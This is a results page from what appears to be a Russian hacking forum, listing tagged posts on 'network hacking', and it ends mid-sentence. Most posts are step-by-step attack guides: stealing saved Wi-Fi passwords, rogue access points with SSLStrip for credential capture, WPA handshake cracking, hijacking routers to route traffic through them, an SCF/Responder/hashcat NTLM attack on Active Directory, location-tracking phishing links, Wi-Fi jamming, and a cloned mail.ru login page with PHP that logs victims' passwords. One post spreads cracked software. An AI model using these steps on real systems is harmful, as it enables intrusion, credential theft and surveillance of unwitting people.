Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'взлом сети'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 25 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете узнать пароль от Wi-Fi роутера без какого-либо взлома. Давайте на минуточку представим, что вам в руки попал чей-то компьютер, на котором вам нужно узнать пароль от сети Wi-Fi, к которому он подключен. Сегодня мы покажем вам, как это сделать ! Погнали! 1. Вызываем командную строку введя "cmd" в поиске. 2. Нажимаем на "Запуск от имени администратора". 3. Затем в командной строке пишем "netsh wlan show profiles". После чего вы узнаете название сети. 4. Далее вводим "netsh wlan show profile name="название сети" key=clear". Сам пароль от Wi-Fi будет показан в поле "Key Content". Далее вам остается сделать скриншот или сохранить в избранное, чтобы не проделывать данные действия повторно. Вот таким вот интересным способом вы можете заполучить практически любой пароль от Wi-Fi, если для этого будет созданы определенные условия. Не нужно париться с программами, со взломами, все делается быстро и без каких-либо следов и лишних телодвижений. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, что делать, если начнут блокировать интернет. Самый простой и доступный способ — использовать анонимную децентрализованную сеть. Сегодня все больше юзеров начинают интересоваться, что же это такое и как такая сеть может помочь избежать блокировки интернета в России. Одна из таких сетей – UTOPIA P2P. UTOPIA легко обходит блокировку и цензуру, обеспечивая свободное общение, поиск информации, передачу данных, проведение онлайн платежей без слежки и утечки данных: 1. Скачайте и установите UTOPIA – ссылка тут 2. Анонимно зарегистрируйтесь – без ввода личных данных и номера телефона 3. Используйте UTOPIA для общения, передачи данных и сёрфинга в интернете – в случае блокировок, сеть все равно будет функционировать 4. Пользуйтесь сами и рассказывайте друзьям – безопасная и доступная сеть подходит каждому Позаботьтесь о свободном и доступном интернет соединении сегодня, чтобы завтра было где читать новости и общаться с друзьями! Сайт проекта – https://u.is/ru Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как создать точку доступа для перехвата данных. Зачастую люди не хотят заботиться о безопасности своих данных, и подключаясь к открытому Wi-Fi сильно рискуют отдать свои данные в руки злоумышленника. Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата. Установка: git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin chmod +x installer.sh sudo ./installer.sh --install wifi-pumpkin Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy". С помощью данной небольшой программы вы можете легко перехватывать данные из сети. Поэтому если вы хотите потренироваться в этом или найти методы защиты от подобных перехватов, то советую попробовать использовать данную программу по своему назначению. Вполне возможно, что она вам пригодится. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной статье я хочу рассказать вам о том, как взломать Wi-Fi при помощи Kali Linux. Для начала взлома вам понадобится сетевой Wi-Fi адаптер, который имеет поддержку режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Лучше всего использовать данный дистрибутив на виртуальной машине или же прямо на компьютере, который имеет обновление загрузочной записи и возможность выбора операционной системы. По сути, Wifite2 можно установить в любом другом дистрибутиве, но лучше всего он будет работать если у вас Kali Linux, так как он является наиболее распространенным. При условии, что Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Погнали! 1. Для того, чтобы установить Wifite2, в терминале введите команды, показанные ниже, для клонирования репозитория и запуска инсталляции: git clone https://github.com/derv82/wifite2.git cd wifite2 ls sudo python setup.py install 2. Для запуска используем следующую команду: ./Wifite.py Для того, чтобы получить подробную информацию по использованию введите команду wifite -h Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! Сегодня мы поговорим о том, как при наименьших усилиях получить наибольший результат, чем, в нашем случае, является бесплатный интернет. Для реализации нам понадобится программа Router Scan. 1. Сначала программа сама попробует подобрать пароль и логин под роутер соседа, но тут не всегда выходит желаемый результат. 2. Если же проге не удалось узнать пароль и логин, то тут нам поможет использование некоторых багов и слабостей каждого из вида роутеров, что позволит нам либо получить информацию, либо обойти стороной авторизацию. Сперва нам потребуется просканировать сети в радиусе действия. Для этого запускаем программу, она спросит, хотим ли мы отправлять полученные данные в общую базу данных, ну и попросит подтвердить пользовательское соглашение. 3. Теперь переходим в последнюю вкладку в программе и выставляем 2 галочки. Теперь следует подождать, пока программа определит WiFi сети. 4. Когда появится сеть, которую мы хотели взломать, жмём на ней ПКМ, потом "Obtain key with WPS" и в появившемся окне "Start Audit". 5. После этого начнётся процесс подбора логина и пароля. Просто ждём, когда программка добродушно предоставит нам нужные данные. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной статье я расскажу вам о том, как отследить какие приложения используют интернет-трафик. Если вас беспокоит ограниченный тарифный план сотового оператора, когда у вас нет доступа к Wi-Fi, или вы хотите убедиться, что определенные приложения не отсылают данные обратно на свои сервера, когда они этого делать не должны – воспользуйтесь приложением GlassWire для Android. Приложение GlassWire тщательно отслеживает использование данных другими приложениями – вы можете видеть, какие приложения на вашем смартфоне используют больше всего интернета (загружая и отправляя данные), можете получать немедленные предупреждения, когда новое приложение начинает связываться с интернетом, и многое другое. Для этого на главной странице приложения необходимо выбрать типсети и период, за который будут отображаться данные о расходе трафика. Если какие-то программы используют соединение в данный момент, это будет отображаться соответствующими иконками. Помимо этого, вы можете установить собственный лимит расхода интернет-трафика. В таком случае приложение будет уведомлять вас, если вы его превысите. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете отправить самоудаляющиеся сообщения. Есть что-то таинственное в сообщении, которое исчезает после того, как вы его прочитали. Этот тип связи может быть очень полезен, позволяя вам делиться секретами или личными фотографиями, не оставляя цифровой след данных. wipenote.io — сервис для отправления самоудаляющихся сообщений и файлов. Перейдя по ссылке напишите нужное сообщение, которое можно будет прочитать только один раз, затем сообщение удалиться. К сообщению можно прикрепить файл или записать голосовое сообщение. Также можно задать время через которое будет удалено сообщение после открытия и установить на него пароль. Когда закончите нажмите "Create note" и сервис выдаст ссылку и QR-код на сообщение. Это очень полезный инструмент, если вы хотите анонимно передавать какую-то информацию другому человеку. Мало того, что ваши данные будут зашифрованы, так и сообщение через какое-то время перестанет быть доступным. Это можно использовать в совершенно различных целях, поэтому пользуйтесь. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно осуществлять взлом Wi-Fi сетей. Существует такая утилита, как AirCrack. Взлом Wi-Fi с её использованием осуществляется путём перехвата и последующей расшифровки handshake. AirGeddon - это инструмент, следующего поколения, способный автоматизировать данную операцию. А это значит, что взлом беспроводных сетей стал еще быстрее и эффективнее. Больше не придется тратить большое количество времени на выполнение различного рода рутинных операций. Он позволит Вам перехватывать и расшифровывать handshake в считанные секунды. Установка: $ git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git $ cd airgeddon/ Использование: $ bash airgeddon.sh Сразу после запуска перед вами появится главное меню утилиты. Для перехвата handshake нужно перевести сетевую карту в режим монитора, для этого пропишите "2", а затем "5". Поздравляю, вы научились пользоваться новой утилитой для взлома сетей. Через некоторое время AirGeddon должен полностью вытеснить AirCrack, так как по сути является более продвинутой версией этой программы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры! Каждый из нас немало времени проводит в сети, ведь каждый уже знает, что в наше время интернет позволяет получить огромное количество информации, даёт людям возможность найти работу и в целом сильно облегчает нашу жизнь. Представьте ситуацию, когда вам нужно срочно выйти в сеть, но мобильный интернет не ловит или же попросту закончился. К огромному сожалению, множество людей в таких ситуациях начинают искать незащищенные точки доступа для выхода в сеть, тем самым подвергая свои данные огромной опасности, так как практически всегда, открытая"общественная" Wi-Fi сеть оказывается точкой доступа для перехвата данных. Все те данные, которые введет человек, подключенный к такой сети, отправятся напрямую к мошеннику. Предлагаю вам проверить, как работает эта система изнутри и создать свою точку для перехвата данных. Нужно зайти в терминал и прописать команды для установки WiFi-Pumpkin: git clone https://github.com/P0cL4bs/wifipumpkin3 cd wifipumpkin3 sudo make install sudo apt install python3-pyqt5 sudo python3 setup.py install Теперь запускаем WiFi-Pumpkin: sudo wifipumpkin3 После запуска у вас откроется интерфейс wifi-pumkin. Заходите во вкладку Setting и придумайте имя своей точке доступа. Далее в Activity Monitor settings ставьте галочки на HTTP-Requests (веб-запросы), HTTP-Authentication (учётные данные с веб-сайтов) и Pumpkin-Proxy. Во вкладке Plugins (плагины) выберите, что вам нужнее. Pumpkin-Proxy позволяет использовать различные готовые решения (кейлогеры, BeEF, внедрение кода и т.д.) Зато SSLStrip+ в паре с dns2proxy позволяют обходить HTTPS и перехватывать намного больше учётных данных. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как с помощью Kali Linux можно взламывать дроны, а именно с помощью специальной программы. DroneSploit - это среда командной строки, основанная на sploitkitи попытка собрать методы взлома и эксплойты, особенно ориентированные на взлом дронов. Для простоты использования интерфейс имеет макет, похожий на Metasploit. В настоящее время он поддерживает только очень небольшое количество моделей дронов, но мы надеемся, что в ближайшем будущем мы будем приветствовать новые предложения. Потребуется: 1. Linux система 2. Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим) Установка: sudo pip install dronesploit Использование: dronesploit Поздравляю, теперь буквально в несколько нажатий вы способны провести атаку практически на любой дрон и попытаться его взломать. Это очень мощный инструмент, которым может пользоваться как новичок, так и опытный взломщик. Подобная программа будет незаменимой в арсенале хакера. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Приветствую, хакеры! Вы задумывались когда-либо над тем, сколько камер установлено повсюду в вашем городе? Их можно встретить на парковках, возле магазинов, на столбах, в помощениях и съемных квартирах. Хотите прямо сейчас узнать, где неподалеку от вас есть камеры? Тогда доставайте смартфон! Речь вовсе не о каком-то шпионском гаджете. Впрочем, установив несколько «шпионских» приложений, вы вполне сможете ощутить себя Джеймсом Бондом. Смартфон: «Обнаружена камера!» Но как обычный смартфон находит камеры? Для этого используются два метода — обнаружение электромагнитных полей или света, который отражается от линзы камеры. С помощью таких приложений можно просканировать помещение и узнать, где установлены следящие устройства. Приложения для поиска скрытых камер Мы сделали для вас мини-подборку бесплатных приложений на Android: Hidden Camera Detector;GliFindernt ;Hidden IR Camera Detector & hidden cam finder.Для iPhone одним из лучших бесплатных приложений является Hidden Camera Detector. Для использования большинства остальных необходимо оплатить подписку. Как находить скрытые камеры с помощью смартфона Рассмотрим принцип поиска камер на примере Hidden Camera Detector. Достаточно открыть приложение, и если поблизости есть камера, микрофон и даже компьютер, приложение известит вас об этом красной точкой. «Сканируйте» пространство, перемещая телефон. Обратите внимание на цифру в середине круга. Если значение около или превышает 100, недалеко от вас находится именно камера. Чтобы эффективнее искать оборудование, держите смартфон так, как будто это пульт от телевизора. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Приветствую, хакеры! Исследователи обнаружили новый способ, который позволяет сформировать цифровой отпечаток пользователя, не только в популярных браузерах вроде Chrome и Firefox, но и в Tor. Суть способа в том, что он перебирает протоколы для запуска приложений на стороне пользователя, и в зависимости от набора установленных - формирует идентификатор. Так, идентификатор, присваиваемый пользователю данным методом, в большинстве случаев уникален для каждого компьютера - а значит, с его помощью можно связать воедино цифровые образы из нескольких отдельных браузеров одного и того же пользователя. Убедитесь в этом сами: Исследователь создал скрипт, который пытается запустить различные программы из браузера (например, используя URL-адрес zoommtg://, предлагающий браузеру запустить клиент Zoom), после чего исходя из полученной информации об установленных программах присваивает вам идентификатор. И хотя сейчас метод формирует идентификатор на основании только 24 программ, список может быть увеличен. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  13. Приветствую, хакеры! Сегодня рассмотрим один вариант атаки на Active Directory. Сперва сканируем сеть на предмет файловых хранилищ с подключением без пароля: nmap -p 445 -sV --script=smb-enum-shares /, где: ● -p — порт; ● -sV — проверка версии сервиса; ● --script=smb-enum-shares — подключение скрипта, чтобы узнать список сетевых ресурсов и права на них. Необходим ресурс, в котором права нынешнего пользователя будут как на чтение, так и на запись (это видно в выводе скрипта). Для доступа без пароля подключение выполняется следующей командой: smbclient \\\\\\ В это хранилище загружаем SCF файл. Формат файла scf — файлы команды для проводника. Запускать его никому не придётся, ведь Windows заходит в директорию и ищет в ней scf-файлы или, например, ярлыки. Если находит, проверяет оригинальный файл, на который они ссылаются. Содержимое файла следующее: [shell] Command=2 IconFile=\\\ [Taskbar] Command=ToggleDesktop Поскольку есть подключение к консоли smb, можем добавить в неё файл командой: put В это же время запускаем responder (об этой утилите рассказывалось в предыдущей части): Responder -I eth0 -wrf Работать предстоит с NetNTLMv2, как заметно из названия, это старший брат NTLM, то есть защищён лучше и брутить его дольше, но ничего нас не остановит После получения хеша начинаем его обработку. Команда следующая: hashcat -m 5600 -a 3 Файл_с_хешем> -w 2 -O -1 ?l?d -i --increment-min=1 --increment-max=6 ?1?1?1?1?1?1, где: ● -m 5600 — тип NetNTLMv2; ● -a 3 — атака перебора по маске; ● -w 2 — чем больше цифра, тем сильнее нагрузка (1-4); ● -O — оптимизация ядра, если возможно; ● -1 ?l?d — определяем пользовательский словарь из маленьких латинских и цифр; ● -i –increment-min=1 –increment-max=6 — последовательный перебор количества символов; ● ?1?1?1?1?1?1 — маска. Применяет пользовательский словарь к каждому символу. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  14. Приветствую, хакеры, в этой статье хочу рассказать о том, как заблокировать постореннего человека, подключенного к вашей сети. Необходимо попасть в меню управления своим Wi-Fi роутером, выполните команду «ipconfig» в командной строке, скопируйте адрес из раздела «Основной шлюз», после чего вставьте его в адресную строку браузера и авторизуйтесь в системе, используя данные на задней части вашего роутера. На разных маршрутизаторах отключение устройства от Wi-Fi сети происходит немного по-разному. Например, если вы пользуетесь роутером TP-Link, зайдите в меню «Беспроводной режим» → «Статистика беспроводного режима» и нажмите «Запретить» возле нужного адреса. После этого необходимо перейти в раздел «Фильтрация MAC-адресов» и нажать кнопку «Включить», чтобы блокировка начала работать. Если же вы пользуетесь роутером от Asus, после перехода в меню маршрутизатора необходимо зайти в раздел «Фильтрация адресов» и вставить блокируемый адрес, предварительно скопировав его из раздела «Карта сети» → «Клиенты». В настройках роутеров других производителей названия параметров могут отличатся, но, в целом, порядок действий везде один и тот же. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци.
  15. Проблема маскировки собственного ip адреса возникает при попытке доступа к регионально заблокированным ресурсам, к примеру. Тогда в ход могут идти либо VPN, либо proxy сервер, которые обычно арендуются у третьих лиц. Однако простейший прокси сервер SOCKS5 можно настроить своими руками в пару команд, на собственном сервере. Это даст возможность самостоятельно контролировать логи, что повысит конфиденциальность, и ускорит время работы. Установка всего необходимого на сервер Для начала нужно подключится к собственному серверу по SSH. Для демонстрации, установка и настройка всего ПО будет производиться на ОС Debian. Обновим систему и пакеты update && apt dist-upgrade Установим Dante Server install dante-server Настройка Dante Server Далее нужно будет открыть конфигурационный файл, и внести в него следующие настройки stderr internal: eth0 port = 8080 external: eth0 socksmethod: username user.privileged: root user.unprivileged: nobody user.libwrap: nobody client pass { from: 0.0.0.0/0 to: 0.0.0.0/0 log: connect error } socks pass { from: 0.0.0.0/0 to: 0.0.0.0/0 log: connect error } Подробно о настройках можно почитать на официальном сайте Dante Server (https://www.inet.no/dante/doc/latest/config/server.html). Добавим нового пользователя -s /bin/false codered && passwd codered1 В зависимости от утилиты для управления работой межсетевого экрана, открываем порт либо так, с помощью iptables -A INPUT -p tcp --dport 8080 -j ACCEPT Либо так, с помощью UFW allow 8080/tcp Почти готово, теперь запускаем и добавляем в автозапуск Dante Server restart danted systemctl enable danted Использование Теперь в том же Proxifier на Windows можно создать новый профиль, ввести ip сервера, имя пользователя и пароль, и пользоваться собственным прокси сервером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци
  16. Инструкция по установке и поиску роутеров: Скачиваем Router Scan с официального сайта (http://stascorp.com/load/1-1-0-56) Теперь нам понадобятся диапазоны ip адресов. Взять их можно с этого сайта (https://4it.me/getlistip), введя название любого города. Полученные диапазоны нужно вписать в соответствующее поле в верхней панели Router Scan. В "Scan ports" можно оставить значения по умолчанию. В "Scanning modules" нужно выбрать только три первых пункта. После нажатия "Start scan" во вкладке "Good Results" начнут появляться потенциально уязвимые устройства с полученными авторизационными данными. Если при подобной проверке ip диапазона вашего города вы нашли в "Good Results" свой роутер, то уже на этом этапе лучше обратиться в техподдержку или вручную обновить прошивку роутера, скачав её с официального сайта. Подключению к роутеру и поднятие VPN Подключение к уязвимому роутеру реализуется за счет браузера. В поисковую строку нужно вписать запрос в виде : Откроется форма входа, в которую нужно вписать данные из колонки "Authorization" в Router Scan. Далее идет процесс поднятия VPN. У каждого роутера разный интерфейс, а некоторые данную функцию вообще не поддерживают. Если объяснять поверхностно, то для начала нужно будет включить службу PPTP вписав придуманные авторизационные данные и выбрав уникальный локальный ip. После чего настроить NAT пробросив порты 1723 и 1729. Подключаться к созданному VPN можно через встроенную службу Windows, которая находится по пути "Пуск" -> "Панель управления" -> "Сеть и интернет" -> "Центр управления сетями и общим доступом" -> "Настройка нового подключения или сети" -> "Подключение к рабочему месту" Выбрав "Использовать моё подключение к интернету(VPN)" нужно вписать ip роутера и придуманные ранее авторизационные данные. Готово, теперь весь трафик атакующего ПК будет идти за счет владельца взломанного роутера. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  17. Сегодня поговорим о знакомом скрипте под названием "Seeker", созданный для поиска местоположения человека посредством перехода по ссылке. Также используется ngrok. Seeker использует HTML5, Javascript, JQuery и PHP для захвата информации об устройстве и геолокации с высокой точностью. Точность полученной информации - около 30 метров. На iPhone по какой-то причине точность местоположения составляет около 65 метров. Он размещает поддельный веб-сайт на Apache Server и использует Ngrok , которая запрашивает разрешение на размещение, и если пользователь ее разрешает, то мы получаем следующие данные: Долгота.Широта.Точность.Высота - не всегда доступна.Направление - доступно только в том случае, если пользователь движется.Скорость - доступна только в том случае, если пользователь движется.Наряду с информацией о местоположении мы также можем получить информацию об устройстве без каких-либо разрешений: Операционная система.Платформа.Количество ядер процессора.Объем оперативной памяти - приблизительные результаты.Разрешение экрана.Информация о GPU.Имя и версия браузера.Открытый IP-адресКод: Установка и запуск. git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod 777 install.sh ./install.sh Код: Запуск - python seeker.py Жертва переходит по сгенерированной ссылке и разрешает доступ к геолокации, после чего мы видим его местоположение. Сразу можно открыть google map. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  18. Zeebsploit Framework — утилита для анализа и дальнейшей эксплуатации уязвимостей у целевых веб-ресурсов. Данный инструмент обладает неплохим функционалом и прост в использовании. Сегодня мы расскажем, как использовать данную утилиту. Для начала напомним, что статья написана в образовательных целях. Мы не несем ответственности за любой возможный вред, причиненный материалами данной статьи. Погнали! Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: pkg update && pkg upgrade Устанавливаем git и python: pkg install git python Клонируем репозиторий инструмента с GitHub: git clone https://github.com/jaxBCD/Zeebsploit.git Далее переходим в папку инструмента: cd Zeebsploit/ Устанавливаем все необходимые библиотеки: python install -r requirements.txt Делаем скрипт исполняемым: chmod +x zsf.py И запускаем: python zsf.py После запуска утилита предложит провести обновление, но делать это не нужно, т. к. мы уже имеем актуальную версию инструмента. Функционал программы можно посмотреть с помощью команды: help Для того, чтобы атаковать определенный веб-ресурс, выбираем направление атаки. После этого выбираем модуль для атаки. Например, для определения версии cms выбираем вектор атаки: scanners Далее выбираем модуль: cms detector Инструмент попросит ввести целевой URL-адрес. После ввода URL-адреса инструмент безошибочно определил версию cms и предоставил ссылку на справочный материал. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  19. ProtonVPN — это VPN-сервис, разработанный создателями знаменитой защищённой электронной почты ProtonMail. Среди разработчиков — учёные из Европейского центра ядерных исследований (CERN) и Массачусетского технологического института (MIT). Как и другие VPN-сервисы, ProtonVPN позволит защитить данные пользователя, сохранить его анонимность, предоставить доступ к заблокированным или региональным ресурсам. Акцент делается на безопасности, потому сервис подойдёт тем, кому важно поддерживать статус инкогнито во время работы в сети и тем, кому важно сохранить важные данные, передаваемые через интернет. Главные особенности ProtonVPN Швейцарское происхождение сервиса. Швейцария славится одними из наиболее серьёзных законов по защите приватности. Кроме того, Швейцария не попадает под юрисдикцию Евросоюза или США, а потому внешнее давление по подобным вопросам исключено. Полная приватность. ProtonVPN не следит за пользователем, не ведёт никакие логи, не остаётся никакой информации о том, что посещал пользователь. Также все данные шифруются при помощи мощных алгоритмов (AES-256). Также используется система Perfect Forward Secrecy, что означает, что зашифрованный трафик не может быть перехвачен и в дальнейшем расшифрован. Бесплатный тариф без подвохов. Вы не увидите на бесплатном тарифе рекламы, ваши данные не будут передаваться третьим лицам и так далее. Всё тарифы честные и соответствуют заявленным возможностям. Сеть Secure Core. Весь трафик этого VPN пропускается через сеть серверов, расположенных в странах, в которых всё хорошо с защитой приватности. Это та же Швейцария, Исландия и так далее. В итоге даже если какой-то сервер будет скомпрометирован, IP-адрес пользователя всё равно не удастся вычислить. Переходим к установке: 1. Скачиваем архив (Для того что бы скачать файл, нужно быть подписанным на канале DARKNET ARENA SOFT ) 2. Распаковываем архив и устанавливаем приложение Proton VPN, следуя инструкциям установщика 3. Заходим на официальный сайт Proton VPN protonvpn.com и регистрируемся на нем 4. Имя пользователя и пароль указываем рандомные, но не забываем их, указываем НЕ ВРЕМЕННУЮ ПОЧТУ (Proton VPN не даст зарегистрироваться с временной т.к. знает её домены), а личную или ту, к которой у вас есть доступ 5. На почту придёт код, который необходимо скопировать на сайт в специальное поле, после чего регистрация завершится 6. Заходим в папку "CRACK" (она рядом с установщиком), копируем файл из нее и вставляем с заменой в папку, в которую мы установили Proton VPN 7. Запускаем Proton VPN с ярлыка на рабочем столе, вводим имя пользователя и пароль и видим такую картину Поздравляю, вы получили бесплатный и вечный VPN с большим количеством стран и серверов без рекламы!
  20. Глушение WiFi-сети с помощью LANs Начнем с LANs. Она умеет не только глушить WiFi, но и другие вещи: Шпионит за пользователямиИндивидуально травит таблицы ARP целевой машины, роутера и при необходимости — сервера DNSРадиус действия глушения сильно зависит от мощности адаптера, но у скрипта есть настройки, которые позволяют глушить всех подряд или только одного клиента. Здесь все просто: скачиваем и устанавливаем зависимости и качаем сам скрипт. $ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan $ git clone https://github.com/DanMcInerney/LANs.py.git $ cd LANs.py/ Теперь можно запускать наш скрипт, чтобы начать глушение WiFi. $ python lans.py -u -p Ключи -u и -p означают активное обнаружение цели для ARP-спуфинга и вывода всех интересных незашифрованных данных, которые они отправляют или запрашивают. Опции -ip здесь нет, поэтому будет выполнено ARP-сканирование сети и его результаты будут сравниваться с результатами живого «неразборчивого» захвата. В результате получится список всех клиентов сети. Нажимайте Ctrl + C для остановки поиска, когда построите карту сети и посмотрите списки подключенных клиентов. Для тех же целей, кстати, можно успешно использовать Nmap (см. также Nmap: обнаружение хостов сети). Точечный вариант глушения будет выглядеть так: $ python lans.py --jam --accesspoint роутера> -s для пропуска> Здесь: —jam — глушить все или некоторые беспроводные точки 2,4 ГГц и клиентов в пределах досягаемости; если необходимо, то вместе с этим можно использовать дополнительные аргументы (ниже);-s — так можно задать MAC, который не будет деавторизован;—accesspoint — тут можно ввести MAC конкретной точки доступа, которая будет выступать в качестве цели.Глушение всех сетей Wi-Fi будет выглядеть так: $ python lans.py --jam Глушение только одной точки доступа: $ python lans.py --jam --accesspoint Здесь тоже можно задать некоторые дополнительные опции: -ch — ограничить глушение одним каналом;—directedonly — не отправлять пакеты деаутентификации на широковещательные адреса точек доступа, а только парам из клиента и хотспота;—accesspoint — так можно указать конкретную точку доступа в качестве цели.Глушение WiFi-сети с помощью WiFiJammer Для глушения WiFi можно также использовать утилиту wifijammer. Она крайне проста в использовании, так что обсуждать здесь почти нечего: без параметров она просто будет заглушать все, что найдет в радиусе досягаемости адаптера. Чтобы не задеть своих, можно исключить некоторые MAC-адреса с опцией -s. Установка wifijammer: $ git clone https://github.com/DanMcInerney/wifijammer.git $ cd wifijammer/ $ sudo python2 wifijammer.py --help Запуск wifijammer: $ sudo python2 wifijammer.py -s для исключения> На этом все! Теперь, с помощью рассмотренных инструментов вы сможете с легкостью глушить WiFi. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  21. Начнем с создания клона сайта: Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы, такие как картинки, аудио файлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого нам нужно изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там. Для примера попробуем создать реплику сайта страницы авторизации Mail. Её адрес https://account.mail.ru/login, чтобы нам просмотреть исходный код страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Но нам не надо вручную всё копировать и сохранять все картинки: в Linux есть более простое решение. В консоли вводим команду wget --page-requisites --convert-links https://account.mail.ru/login После этого у нас в папке, где была открыта консоль, появится папка account.mail.ru в которой будет файл login. Если открыть его в браузере, то мы увидим, то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальном сервере будет практически таким же. Убеждаемся, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/ Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами: source /etc/apache2/envvars systemctl restart apache2 После того как приветственная страница отображается, нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login. Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action="https://auth.mail.ru/cgi-bin/auth" Меняем найденный текст на action="auth.php". Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда: <?php file_put_contents('log/login_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND); ?> Пояснение file_put_contents - функция для записи данных в файл, log/login_log.txt - путь к файлу. $_POST['Username'] - имя пользователя из формы, а $_POST['Password'] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец. Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal. В появившимся окне вводим: mkdir log chmod 777 log Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А 